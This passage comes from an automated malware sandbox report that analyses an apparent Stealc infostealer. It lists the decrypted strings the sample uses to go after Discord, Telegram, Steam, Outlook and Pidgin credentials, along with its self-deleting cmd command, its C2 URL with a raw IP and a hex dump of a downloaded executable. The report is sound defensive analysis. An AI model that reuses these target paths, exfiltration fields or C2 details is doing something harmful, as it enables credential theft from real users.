                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - HWID:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - OS:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Architecture:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - UserName:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Computer Name:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Local Time:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - UTC:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Language:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Keyboards:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Laptop:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Running Path:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - CPU:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Threads:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Cores:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - RAM:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - Display Resolution:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: - GPU:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: User Agents:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Installed Apps:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: All Users:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Current User:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Process List:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: system_info.txt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: freebl3.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: mozglue.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: msvcp140.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: nss3.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: softokn3.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: vcruntime140.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Temp\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: .exe
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: runas
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: open
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: /c start
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %DESKTOP%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %APPDATA%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %USERPROFILE%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %DOCUMENTS%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %PROGRAMFILES_86%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: %RECENT%
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: *.lnk
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: files
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \discord\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Local Storage\leveldb
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Telegram Desktop\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: key_datas
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: D877F783D5D3EF8C*
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: map*
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: A7FDF864FBC10B77*
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: A92DAA6EA6F891F2*
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: F8806DD0C461824F*
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Telegram
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Tox
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: *.tox
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: *.ini
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Password
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 00000001
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 00000002
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 00000003
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: 00000004
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Outlook\accounts.txt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Pidgin
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \.purple\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: accounts.xml
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: dQw4w9WgXcQ
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: token:
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Software\Valve\Steam
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: SteamPath
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \config\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ssfn*
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: config.vdf
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DialogConfig.vdf
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: libraryfolders.vdf
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: loginusers.vdf
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Steam\
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: sqlite3.dll
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: done
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: soft
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: \Discord\tokens.txt
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: https
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: POST
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: HTTP/1.1
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: Content-Disposition: form-data; name="
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: hwid
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: build
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: token
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: file_name
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: file
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: message
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                    Source: 8.2.DADE.tmp.exe.400000.0.unpackString decryptor: screenshot.jpg
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,8_2_00406000
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,8_2_00404B80
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,8_2_00407690
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,8_2_00424090
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,8_2_00409BE0
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,8_2_00409B80
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D78F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,8_2_009D78F7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E7047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,8_2_009E7047
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D4DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,8_2_009D4DE7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D9DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,8_2_009D9DE7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F42F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,8_2_009F42F7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D9E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,8_2_009D9E47
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D6267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,8_2_009D6267
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E7260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,8_2_009E7260
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009DEFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,8_2_009DEFF7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\ief722WreR.exeUnpacked PE file: 0.2.ief722WreR.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeUnpacked PE file: 8.2.DADE.tmp.exe.400000.0.unpack
                    Source: ief722WreR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B8C59 FindFirstFileExW,0_2_024B8C59
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009EE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,8_2_009EE0B7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009ED8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009ED8A7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009D1807
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009E1827
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,8_2_009D1820
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009EE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009EE597
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009E5127
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009E1EA7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009DDFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009DDFD7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009E3F27
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009ECF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009ECF47

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 92.255.57.89:80
                    Source: Malware configuration extractorURLs: http://92.255.57.89/45c616e921a794b8.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 16:42:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 16:30:01 GMTETag: "4a000-628ecfe24ce67"Accept-Ranges: bytesContent-Length: 303104Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3d 89 df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 42 00 00 04 00 00 17 1a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 18 03 00 3c 00 00 00 00 f0 40 00 c8 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc ef 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 20 00 00 00 00 03 00 00 22 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 30 03 00 00 6c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 